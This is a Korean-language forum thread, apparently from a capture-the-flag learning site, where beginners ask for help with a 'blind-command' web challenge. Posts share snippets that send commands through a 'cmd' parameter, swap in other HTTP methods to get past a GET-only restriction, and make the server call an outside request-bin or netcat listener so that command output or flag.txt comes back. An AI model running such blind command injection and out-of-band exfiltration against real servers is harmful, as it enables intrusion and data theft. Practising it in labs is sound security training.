blind-command

post로 날려야 커맨드가 실행을 해서 아래와 같이 파이썬으로 작성을 해서 날렸는데 405 에러가 나네요. 다른 문제에서는 됐었는데요.... import requests url = "http://host1.dreamhack.games:12584" res = requests.post(url, data={'cmd':'ls'}) print (res.text) post로 날리려면 어떻게 해야 하나요? 혹시 제가 처음부터 방향성을 잘못 잡고 있는 것인지요?? @.@ 다른 질문들을 읽어봐도.... 어뜨케 하는 건지 도통 모르겠네요. ㅠ.ㅠ 커맨드 실행을 해야 뭐라도 할텐데... 흠..... 왕초보

curl -F "filename=flag.txt" http://ip:port 이거 동작이 안 되는데 다른 방법이 있나요? 이 문제 curl -d 옵션은 됨

답을 풀고 나니 너무 많은 힌트를 유출한것 같아서 질문을 삭제했습니다. 일단은 강의 내용중 실행 결과를 확인할 수 없는 환경 을 잘 보시고 그걸 적용하기 전에는 어떤 방식으로 적용해야 할지는 다른 질문들을 참고하시면 되겠습니다. 헐~ 평소 잘 사용 안하는 것들이라서 어려웠는데, 풀고나니... 그리 어렵지 않네요. ㅎㅎㅎ

get method 우회 방법좀 부탁드립니다.

서버에 호스트 ip(공인ip):8080 로 nc툴써서 ls 명령어 보내게 하고 호스트에서 nc로 리슨하게 했는데 반응이 전혀없네요..ㅠㅠ 강의보고 한건데 왜 안되는지 잘모르겠습니다 도움 부탁드려요

host1.dreamhack.games:23376으로 접속을 했는데 ?cmd=[cmd]이렇게만 뜨는데 이게 맞나요?

서버에서 실행하는 system 명령어(os.system(cmd))에 대한 결과를 확인하기 위해 curl과 python을 이용하여 두개의 요청을 보냈습니다! 그런데 python으로 한 요청의 결과 값이 오지 않는 이유를 모르겠습니다... S_METHOD에는 GET 메소드 대신 사용할 메소드가 들어갔습니다. cmd1을 통한 요청의 응답은 오지 않았고, cmd2를 통한 요청은 응답이 왔습니다 import requests import os link = "https://vmtpmuf.request.dreamhack.games" cmd1 = f"python -c 'import requests; requests.get(\"{link}\")'" cmd2 = "curl -v 'https://vmtpmuf.request.dreamhack.games'" if name == "main": chall_port = int(sys.argv[1]) chall_url = f"http://host1.dreamhack.games:{chall_port}/?cmd={cmd}" #print(cmd) #print(chall_url) #os.system(cmd) response = requests.S_METHOD(chall_url) `

nc를 써보든 curl을 써보든 메소드 우회해서 입력하는데 반응이 안오네요.. 똑같이 직접 서버 실행해서 해보면 잘되는데 왜 이럴까요? 힌트라도 주시면 감사하겠습니다.

포트포워딩은 할줄모르고 따른 쉬운방법으로 명령어 결과 나오게 할수 없을까여 ㅠㅠㅠ

윈도우용 nc 받아서 -l -p 1234로 서버 띄우고 파일 내용은 일단 접어두고 응답 오는지 보려고 하는데 답이 안오네요. 공유기에서 포트포워딩 설정도 했고 메소드는 head부터 다 날려봤습니다. 답이 없으니 답답하네요. 그러니 blind-command겠습니다만. 그리고 드림핵 툴즈 서비스를 이용하면 쉽다는 말씀도 있던데 사용법 같은 게 있을까요? 하수를 위해 조언부탁드립니다.